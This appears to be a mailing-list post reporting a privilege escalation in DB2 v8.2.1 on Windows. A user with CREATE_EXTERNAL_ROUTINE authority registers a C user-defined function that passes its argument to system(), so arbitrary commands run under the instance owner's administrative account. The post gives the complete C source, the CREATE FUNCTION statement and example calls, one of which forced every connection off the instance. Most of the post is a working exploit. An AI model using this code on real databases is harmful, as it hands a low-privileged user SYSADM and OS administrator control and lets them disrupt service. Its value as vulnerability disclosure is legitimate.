Hello.
v8.2.1, Windows.
I have a default installation on Windows where instance owner has
administrative rights in the system.
In this case user with only CREATE_EXTERNAL_ROUTINE authority and
(IMPLICIT_SCHEMA authority or CREATEIN privilege) can get SYSADM
authority in DB2 and OS administrator rights!
Anybody can try this:
--- c source ---
#include <stdlib.h>
#include <sqludf.h>
void SQL_API_FN systemCall(
SQLUDF_VARCHAR *command, /* input */
SQLUDF_INTEGER *result, /* output */
/* null indicators */
SQLUDF_NULLIND *command_ind,
SQLUDF_NULLIND *result_ind,
SQLUDF_TRAIL_ARGS)
{
int rc = 0;
/* execute the command */
rc = system(command);
*result_ind = 0;
*result = rc;
}
--- c source end ---
--- udf declaration ---
CREATE FUNCTION systemCall( command VARCHAR(2000) )
RETURNS INTEGER
SPECIFIC systemCall
EXTERNAL NAME 'os_call!systemCall'
LANGUAGE C
PARAMETER STYLE SQL
DETERMINISTIC
FENCED
RETURNS NULL ON NULL INPUT
NO SQL
EXTERNAL ACTION
NO SCRATCHPAD
DISALLOW PARALLEL;
--- udf declaration end ---
And now I can do anything with instance and OS with such calls:
db2 values systemCall('db2cmd /i /w /c db2 ...')
db2 values
systemCall('any_os_command_that_will_be_run_under_ administrative_account')
For example:
db2 values systemCall('db2cmd /i /w /c db2 force applications all')
killed all connections in the instance including my own too.
What do you think about this?
Sincerely,
Mark B.